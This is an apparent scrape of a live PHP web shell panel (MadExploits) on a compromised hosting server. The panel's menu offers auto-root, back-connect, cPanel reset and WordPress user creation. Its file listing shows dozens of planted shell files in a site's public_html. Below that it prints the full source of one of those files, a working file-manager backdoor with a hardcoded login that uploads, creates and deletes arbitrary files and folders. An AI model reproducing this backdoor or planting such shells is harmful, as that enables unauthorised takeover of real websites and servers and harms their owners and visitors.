Linux vps-4302913.novaexata.com.br 3.10.0-1160.119.1.el7.tuxcare.els19.x86_64 #1 SMP Mon Mar 31 17:29:00 UTC 2025 x86_64
Apache
: 162.214.88.42 | : 216.73.216.99
166 Domain
7.3.33
wwnova
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
wwnova /
public_html /
tudosorte.com.br /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
uploads
[ DIR ]
drwxr-xr-x
.buy.php
579
B
-rw-r--r--
.documentroot.php
280
B
-rw-r--r--
.goods.php
577
B
-rw-r--r--
.wp-esp.php
577
B
-rw-r--r--
0x194945BXRH.php
4.12
KB
-rw-r--r--
0x19495GZCOU.php
4.12
KB
-rw-r--r--
0x1949BIJKKG.php
4.12
KB
-rw-r--r--
0x1949LKGFCR.php
4.12
KB
-rw-r--r--
0x1949Q4FPN1.php
4.12
KB
-rw-r--r--
0x1949RNWM66.php
4.12
KB
-rw-r--r--
Private-MASS-ova.php
19.06
KB
-rw-r--r--
admin.php
209
B
-rw-r--r--
bero.pHtML
44.85
KB
-rw-r--r--
berofc.php
44.85
KB
-rw-r--r--
bw.php
9.51
KB
-rw-r--r--
dataat.pHtML
16
KB
-rw-r--r--
default.xml
402
B
-rw-r--r--
documentroot.php
280
B
-rw-r--r--
error_log
27.57
KB
-rw-r--r--
error_log.pHtML
28.62
KB
-rw-r--r--
error_log.php
28.62
KB
-rw-r--r--
finalkitaya.PHP
6.86
KB
-rw-r--r--
googlef7118cfda07b48b4.html
53
B
-rw-r--r--
index.php
381.47
KB
-rw-r--r--
logssss.pHtML
3.12
KB
-rw-r--r--
modric8BTCHM.php
70.77
KB
-rw-r--r--
modricDHXFVX.php
2.14
KB
-rw-r--r--
modricPNBH8L.php
70.77
KB
-rw-r--r--
modricZW9ITU.php
2.14
KB
-rw-r--r--
perantaraupload.php
6.02
KB
-rw-r--r--
php.ini
40
B
-rw-r--r--
postnews.php
5.72
KB
-r--r--r--
tes110000.pHtML
5.63
KB
-rw-r--r--
uploa.pHtML
6.02
KB
-rw-r--r--
wp-est.php
575
B
-rw-r--r--
wp-ompira.php
577
B
-rw-r--r--
x7.php
278
B
-rw-r--r--
没啥.php
13.72
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : logssss.pHtML
<?php session_start(); // --- LOGIN SEDERHANA --- $USER = 'admin'; $PASS = 'password'; if (!isset($_SESSION['logged_in'])) { if (isset($_POST['user']) && isset($_POST['pass'])) { if ($_POST['user'] === $USER && $_POST['pass'] === $PASS) { $_SESSION['logged_in'] = true; } else { echo '<form method="post"> User: <input name="user"><br> Pass: <input name="pass" type="password"><br> <input type="submit"> </form>'; exit; } } else { echo '<form method="post"> User: <input name="user"><br> Pass: <input name="pass" type="password"><br> <input type="submit"> </form>'; exit; } } // --- PATH DINAMIS --- $dir = isset($_GET['dir']) ? $_GET['dir'] : '/'; $dir = rtrim($dir, '/') . '/'; if (!is_readable($dir)) { die("Tidak bisa akses directory ini"); } // --- HANDLE UPLOAD --- if (isset($_FILES['file_upload'])) { $target = $dir . basename($_FILES['file_upload']['name']); if (move_uploaded_file($_FILES['file_upload']['tmp_name'], $target)) { echo "<b>Upload berhasil: </b>" . htmlspecialchars(basename($_FILES['file_upload']['name'])) . "<br>"; } else { echo "<b>Upload gagal!</b><br>"; } } // --- HANDLE HAPUS --- if (isset($_GET['delete'])) { $del = $dir . $_GET['delete']; if (is_dir($del)) rmdir($del); elseif (is_file($del)) unlink($del); header("Location: ?dir=" . urlencode($dir)); exit; } // --- HANDLE BUAT FOLDER --- if (isset($_POST['new_folder'])) { $nf = $dir . $_POST['new_folder']; if (!file_exists($nf)) mkdir($nf); } // --- HANDLE BUAT FILE --- if (isset($_POST['new_file'])) { $nf = $dir . $_POST['new_file']; if (!file_exists($nf)) file_put_contents($nf, ""); } // --- LIST FILES & FOLDER --- $files = scandir($dir); echo "<h3>Directory: $dir</h3>"; if ($dir != '/') echo "<a href='?dir=" . urlencode(dirname($dir)) . "'>.. (Up)</a><br><br>"; // --- FORM UPLOAD --- echo '<form method="post" enctype="multipart/form-data"> Upload file: <input type="file" name="file_upload"> <input type="submit" value="Upload"> </form><br>'; // --- FORM BUAT FOLDER --- echo '<form method="post"> Buat folder baru: <input type="text" name="new_folder"> <input type="submit" value="Buat Folder"> </form><br>'; // --- FORM BUAT FILE --- echo '<form method="post"> Buat file baru: <input type="text" name="new_file"> <input type="submit" value="Buat File"> </form><br>'; // --- LISTING FILE/FOLDER DENGAN LINK HAPUS --- foreach ($files as $file) { if ($file == '.') continue; $path = $dir . $file; $delete_link = "?dir=" . urlencode($dir) . "&delete=" . urlencode($file); if (is_dir($path)) { echo "[DIR] <a href='?dir=" . urlencode($path) . "'>$file</a> | <a href='$delete_link'>Hapus</a><br>"; } else { echo "[FILE] $file | <a href='$delete_link'>Hapus</a><br>"; } } ?>
Close